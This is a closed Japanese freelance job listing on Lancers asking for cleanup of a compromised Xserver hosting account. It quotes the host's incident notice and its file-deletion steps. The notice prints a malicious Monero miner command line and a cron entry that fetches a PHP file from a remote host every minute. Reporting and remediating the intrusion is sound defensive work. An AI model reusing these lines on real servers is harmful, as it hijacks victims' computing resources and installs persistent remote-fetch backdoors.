この募集は2018年10月15日に終了しました。

Xサーバー内のチェックおよび修正作業の仕事

Xサーバー内のチェックおよび修正作業に関する仕事・募集案件ページです。クラウドソーシングのランサーズで、サーバー・ネットワーク構築に関する最適な外注/発注先をお探しの方、副業案件・求人をお探しのフリーランスの方はまず会員登録がおすすめです。

見積もり募集の結果

募集期間

5日間

提案数

4件

当選人数

1 件

(募集人数1人)

実際の発注内容

依頼の予算
20,000 円 ~ 50,000
実際の支払い金額
50,000 円 ~ 60,000
製作期間
25
実際の受注者
言問株式会社
言問株式会社

本人確認 使われ続けるWEBをお届けします。

  • 希望時間単価 ---
  • 実績 40
  • 評価満足率 94 %
  • プロジェクト完了率 95%
  • 機密保持
  • 本人確認
  • 電話

言問株式会社はCMSをはじめとしたWeb制作・開発経験10年以上のメンバー12名が揃ったプロフェッショナル集団です。 案件につきましては、関東、中部、関西、東北、九州と 全国に渡って対応しております。 弊社の売りでもあるCMSについてはWordPress, Drupal, Movable Type,a-blog cms, NOREN, SitePublis, Craft CMS... 続きを読む

スキル
Apache
Drupal
CSS
HTML
Linux
Movable Type
... もっと見る
対応可能な依頼のジャンル
IT・通信・インターネット
マスコミ・メディア
塾・予備校
工業・製造
卸売・小売
... もっと見る
発注者の声

見積もり募集の内容

依頼の目的・背景
弊社で借りているXserverより以下の対応依頼が来たので、修正できる方を探しております。


「お客様のサーバーアカウントにおける不正なアクセスの検知および制限の実施について」

この度の負荷上昇に際してプロセスの稼働状況を確認しましたところ、
以下の不正なプロセスが多数稼働しておりました。

▼稼働していた不正なプロセス
-------------------------------------------------------
./cnrig -a cryptonight --donate-level 1 --max-cpu-usage 50 -o xmr.pool.minergate.com:45700 -u 4635633@mail.ru -p x --variant 1 -k
-------------------------------------------------------

これを受け、当サポートにてセキュリティ調査を行いましたところ、
お客様がご利用のプログラムにセキュリティ上致命的なバグ(脆弱性)が存在し、
当該脆弱性を第三者に悪用されてしまった可能性が非常に高い状況でございました。


そのため、事後のご案内となり大変恐縮でございますが、
緊急措置として下記制限を実施しております。

▼サポートにて実施した制限内容
-------------------------------------------------------
・当該サーバーアカウントに対する緊急的なWebアクセス制限を実施

 ※上記処理に伴い、Webアクセスを行うと403エラーとなる状況です。


・設置されていた下記の不審なCron設定の削除

 * * * * * wget http://xxxxxxxxxx.online/stylewpp.php
-------------------------------------------------------




具体的な修正の流れは以下の通りになります。

ご依頼後に復旧したい5個程度のドメインをお伝えしますので、
WPサイトとメーラーのバックアップなどをしていただき、
以下の復旧作業をお願いしたいと考えております。

現在使っていないドメインがいくつも入っていますが、
それらのデータなどはすべて削除していただくだけで構いません。


───────────────────────────────────
[2] サーバーアカウント上に設置されたファイルを全て削除してください。
----------------------------------------------------------------------

 お手数ですが、下記の手順にて「独自ドメイン」「初期ドメイン」、および
 「その他のフォルダ」に設置されたファイルの削除をお願いいたします。

  ※この作業による、データベースの初期化・削除はございません。


 【!】ご注意ください

  下記の作業により、お客様のサーバーアカウント上に設置されている
  ホームページデータやメールデータおよび各種設定がすべて削除されます。

  画像、プログラム、設定ファイルやメールデータ、メールアドレス一覧などの
  必要なデータは事前にバックアップを取った上でご対応ください。

 ------------------------------------------------------------
 ◆「独自ドメイン」のデータ削除について

  「サーバーパネル」→「ドメイン設定」より、設定中のドメイン名を
  すべて削除してください。

  ※オプション独自SSL証明書が設定されているドメインに関しては
   「ドメイン設定」より対象ドメインの「初期化」より
   「ウェブ領域・設定の初期化」をご利用ください。


 ◆「初期ドメイン」のデータ削除について

  「サーバーパネル」→「ドメイン設定」へアクセスしていただき、
  削除が不可能な初期ドメイン名を「初期化」してください。

  ※「ウェブ領域・設定の初期化」をご利用ください。


 ◆「その他のフォルダ」のデータ削除について

  FTPソフトや「ファイルマネージャ」でサーバーアカウントを参照し、
  アクセスした際に表示されるフォルダが以下のみになることを
  ご確認ください。

  ・「初期ドメイン名」のフォルダ
  ・(オプション独自SSLを利用している)「ドメイン名」のフォルダ
  ・「ssl」フォルダ

  上記以外のフォルダやファイルが存在する場合、
  FTPソフトやファイルマネージャーにて個別に削除してください。
 ------------------------------------------------------------
開発の進捗状況
ランサーに相談して決めたい
開発の継続性
今回のみ、開発をお願いいたします。
重視する点
予算、クオリティ、柔軟な対応
希望スキル
ランサーに相談して決めたい
補足説明
設定なし

この仕事に似たサーバー・ネットワーク構築の他の仕事を探す

会員登録する (無料)